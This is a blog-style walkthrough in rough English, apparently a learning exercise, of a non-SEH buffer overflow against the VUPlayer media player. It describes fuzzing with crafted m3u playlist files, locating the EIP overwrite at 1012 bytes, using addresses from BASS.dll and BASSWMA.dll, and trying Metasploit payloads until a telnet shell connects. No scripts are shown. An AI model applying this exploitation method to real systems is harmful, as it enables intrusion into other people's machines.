VuPlayer Buffer Overflow - Non SEH

In this article I tried with a buffer overflow exploitable VUPLAYER, in this case the application category of non-SEH, before I do exploitation progress I think I must to do Information Gathering about Application as Target.

I open application and press "help" then press "about vuplayer" and get link of official website about application target, so I choose to go to website to get some information.

I found some information about support file and encoding ability of appcilation, after that I want to test how this application running

This application running and play file mp3, after I test with normal file I try to use fuzzer with anomal content to test and see what a resplond

This is file script to create mp3 file with anomal content, and when I load this file in application here is result

Nothing change, I dont look any crash of system application, so I choose to do not with file load mp3, but with open playlist, when I collect information about application I found application can load vpl as default playlist, I think this is will load direct to application here is script

And I try to load that file was created with this python script

 No load anything and cant to play, I suppose this fuzzer doesn't work with this application, but I want to look with debugger, at this case I use not Ollydbg but with Imminity Debugger, this is result when I open application with Immunity Debugger

I found Alert Message about entry point module BASS, BASSWMA and BASSMIDI, when I open this application, and this is data memory when I open VUPLAYER with Immunity Debugger

I open the application one ogain to look application more detail

I check how much file support to open and read with this application on playlist, I found here is vpl, m3u, pls, asx, wax and cue

I choose number 2 is m3u extention of next fuzzer, here is modification script to try fuzzing application.

And I open application from Immunity Debugger to identification change memory condition when this file load

As I load fake playlist with extention m3u aplication show crash, like seen at the picture, ESP and ESI was flooding with "A" caracter and EIP overwriten by "41" character,but I found screen at left become blank, but most important is fuzzer is running and give crash effect in application, at next stage is make pattern character in metasploit tools to load in script, and this will be like this

And this script I will load again to application, and look what is happend after that

This is result effect in memory when the file has loaded in application, now point of EIP has known and character in ESP possible to count in metasploit tools in pattern_offet like here

After know interval byte data to EIP from ESP now I try to apply this data into last modification fuzzer to be like this

And I'll run it to application one more time to proof EIP address is correct, and this is result of script effect

EIP has overwrited by "AAAAAAAA" this mean is EIP address has correct at 1012 byte of data memory, after found address ESP and EIP now I try to make next modification fuzzer  with addjusment ESP address, to found it choose mode to Executable module, like this I found and this data will include to next modification of fuzzer

And the fuzzer willbe like this

From here I test to load payload fro metasploit web, this will load payload to make exploit contain payload into system's target, here is payload I use

Now I test this exploit to load with application in system's target and this is condition after I load exploit in application

I try to make connection to system target

I found this is failed, maybe connection has failed cause not there channel to make connection, I have idea to look with wireshark, and this is capture screen of wireshark

I found TCP active and I try to modification last script with addusment, I just experiment with this, I still confuse to read wireshark and found acurate information from there so this is modification from my script

And I try to do with this experimental script

This condition EIP change to 90909090 and I feel its strange, and possible it is failed, but I wanna test to make connection

Like I guess this is failed, but I feel strange when I open application from Immunity Debugger that application (VUPLAYER) give pop-up alert message and maybe that is the way to exploit this application, here is alert message from application every opened by Immunity Debugger

 This alert have label "Entry Point" with 3 message, BASS, BASSWMV, abd BASSMIDI, I think this is key entry point alternative cause in first try teory with manipulation file on playlist is failed, now I'll try to find more about this message deeply.


I try to load again this application from Immunity debugger and search for module BASS I found here

I found like this and I try to enter with BASS.dll for executable module to target exploit way

From here I want to try attack from this ESP address in module BASS with this script

And I test to run it in application with monitoring by Immunity debugger

Now I'll continue to the step like before treat

From this data offset I modify my script fuzzer to be like this

And try to fix EIP address can to change overwrite by this data like this

Here is script success to overwrite EIP and now I wanna try to load payload with last payload with address ESP from BASS.dll

Result still same with last experiment, and tsill fialed to make connection 

Here I will run to attack with module BASSWMA.dll

And modify script on ESP address used by BASSWMA module

Here is same, failed, but at this rate I suspect failure is in payload, I'll try to change type of payload into the script now I use Reverse DLL Inject.

Here I found failed again, Now I think this is problem is in payload, this is maybe contain bad character, maybe I'll try to generate payload in metasploit 

Here, once again I found failed to make connection, till I make EIP's address overwriten by Fuzzer content is look like success but after that step I always failed in generate payload.


After I tried with uncounting trial generate payload here is worked script like here

Nothing have significant change in script, I just remove variable unused and load payload and run it to application

Condition aplication have crash with freeze like that picture and condition of memories like here

And I'll try to make connection from backtrack terminal with telnet and result is like here

Now I have success to exploit this application and I think this payload will work with another hole like in BASS.dll, BASSWMA and BASSMIDI, cause I have success to take over EIP address and the problem just in payload.


Next I'll learn more to find bad character, cause I have lost so many time to find payload to matched and work without bad character.